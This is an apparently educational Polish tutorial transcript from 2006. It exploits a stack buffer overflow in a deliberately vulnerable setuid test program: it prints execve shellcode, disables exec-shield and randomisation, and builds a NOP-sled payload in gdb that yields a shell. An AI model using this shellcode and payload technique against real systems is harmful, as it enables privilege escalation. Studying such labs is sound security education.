Buffer Overflow

    -- Sebastian Pawlak, 2006.


Sesja pokazująca wykorzystanie błędu typu buffer overflow na stosie do uruchomienia własnego shellcode'u.


Kod źródłowy pliku "sesja2":

[hacka@Jupiter vuln]$ ls
shell.asm  vuln.c
[hacka@Jupiter vuln]$ cat shell.asm
BITS 32
                                                                                
        jmp short data
start:  pop esi
                                                                                
        xor eax, eax
        mov byte [esi + 7], al
        mov long [esi + 8], esi
        mov long [esi + 12], eax
                                                                                
        mov byte al, 0x0b
        mov ebx, esi
        lea ecx, [esi + 8]
        lea edx, [esi + 12]
        int 0x80
                                                                                
        xor ebx, ebx
        mov eax, ebx
        inc eax
        int 0x80
                                                                                
data:   call start
db      '/bin/sh'
[hacka@Jupiter vuln]$ nasm -o shell.bin shell.asm
[hacka@Jupiter vuln]$ ls -l
total 12
-rw-r--r--  1 hacka hacka 400 Mar 31 22:24 shell.asm
-rw-rw-r--  1 hacka hacka  45 Mar 31 22:28 shell.bin
-rw-r--r--  1 hacka hacka 190 Mar 31 22:24 vuln.c
[hacka@Jupiter vuln]$ od -tx1 shell.bin
0000000 eb 1f 5e 31 c0 88 46 07 89 76 08 89 46 0c b0 0b
0000020 89 f3 8d 4e 08 8d 56 0c cd 80 31 db 89 d8 40 cd
0000040 80 e8 dc ff ff ff 2f 62 69 6e 2f 73 68
0000055
[hacka@Jupiter vuln]$ od -tc shell.bin
0000000 353 037   ^   1 300 210   F  \a 211   v  \b 211   F  \f 260  \v
0000020 211 363 215   N  \b 215   V  \f 315 200   1 333 211 330   @ 315
0000040 200 350 334 377 377 377   /   b   i   n   /   s   h
0000055
[hacka@Jupiter vuln]$ gcc -g -o vuln vuln.c
[hacka@Jupiter vuln]$ su root
Password:
[root@Jupiter vuln]# chown root.root vuln
[root@Jupiter vuln]# chmod u+s vuln
[root@Jupiter vuln]# exit
[hacka@Jupiter vuln]$ ls -l
total 24
-rw-r--r--  1 hacka hacka   400 Mar 31 22:24 shell.asm
-rw-rw-r--  1 hacka hacka    45 Mar 31 22:28 shell.bin
-rwsrwxr-x  1 root  root  10651 Mar 31 22:31 vuln
-rw-r--r--  1 hacka hacka   190 Mar 31 22:24 vuln.c
[hacka@Jupiter vuln]$ ./vuln aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[hacka@Jupiter vuln]$ ./vuln aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Segmentation fault
[hacka@Jupiter vuln]$ su root
Password:
[root@Jupiter vuln]# cat ../\!/unprotect.sh
#!/bin/bash
/sbin/sysctl -w kernel.exec-shield=0
/sbin/sysctl -w kernel.randomize_va_space=0
 
[root@Jupiter vuln]# cd ../\!/
[root@Jupiter !]# ./unprotect.sh
kernel.exec-shield = 0
error: 'kernel.randomize_va_space' is an unknown key
[root@Jupiter !]# cd ../vuln
[root@Jupiter vuln]# exit
[hacka@Jupiter vuln]$ gdb ./vuln
GNU gdb Red Hat Linux (6.0post-0.20040223.19rh)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...Using host libthread_db lib
rary "/lib/tls/libthread_db.so.1".
 
(gdb) set args aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
(gdb) r
Starting program: /home/hacka/vuln/vuln aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaa
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
 
Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
(gdb) b func
Breakpoint 1 at 0x8048379: file vuln.c, line 7.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
 
Starting program: /home/hacka/vuln/vuln aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaa
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
 
Breakpoint 1, func (p=0xfefff966 'a' <repeats 200 times>gt;...) at vuln.c:7
7           strcpy(buf, p);
(gdb) cont
Continuing.
 
Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
(gdb) set args `perl -e 'print "\x90"x211'; cat shell.bin; perl -e 'print "\x99\
x99\x99\x99"x2'`
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
 
Starting program: /home/hacka/vuln/vuln `perl -e 'print "\x90"x211'; cat shell.b
in; perl -e 'print "\x99\x99\x99\x99"x2'`
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
 
Breakpoint 1, func (p=0xfefff98a '\220' <repeats 200 times>gt;...) at vuln.c:7
7           strcpy(buf, p);
(gdb) cont
Continuing.
 
Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
(gdb) info reg
eax            0x0      0
ecx            0xfffffcf5       -779
edx            0xfefffa93       -16778605
ebx            0x61dffc 6414332
esp            0xfefff708       0xfefff708
ebp            0x90909090       0x90909090
esi            0x2      2
edi            0x6200fc 6422780
eip            0x90909090       0x90909090
eflags         0x210286 2163334
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) x/s 0xfefff708
0xfefff708:      '\220' <repeats 75 times>gt;, " \037^1 \210F\a\211v\b\211F\f \v\21
1 \215N\n\215V\f \2001 \211 @ \200     /bin/sh\231\231\231\231\231\231\231\231"
(gdb) x/s 0xfefff708-100
0xfefff6a4:      '\220' <repeats 175 times>gt;, " \037^1 \210F\a\211v\b\211F\f \b\2
11 \215N\b\215V\f "...
(gdb) set args `perl -e 'print "\x90"x211'; cat shell.bin; perl -e 'print "\xa4\
xf6\xff\xfe"x2'`
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
 
Starting program: /home/hacka/vuln/vuln `perl -e 'print "\x90"x211'; cat shell.b
in; perl -e 'print "\xa4\xf6\xff\xfe"x2'`
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
 
Breakpoint 1, func (p=0xfefff98a '\220' <repeats 200 times>gt;...) at vuln.c:7
7           strcpy(buf, p);
(gdb) cont
Continuing.
 
Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
(gdb) set args `perl -e 'print "\x90"x211'; cat shell.bin; perl -e 'print "\xa4\
xf6\xff\xfe"x4'`
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
 
Starting program: /home/hacka/vuln/vuln `perl -e 'print "\x90"x211'; cat shell.b
in; perl -e 'print "\xa4\xf6\xff\xfe"x4'`
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
 
Breakpoint 1, func (p=0xfefff982 '\220' <repeats 200 times>gt;...) at vuln.c:7
7           strcpy(buf, p);
(gdb) cont
Continuing.
sh-2.05b$
w3cw3c
automatyka przemysłowa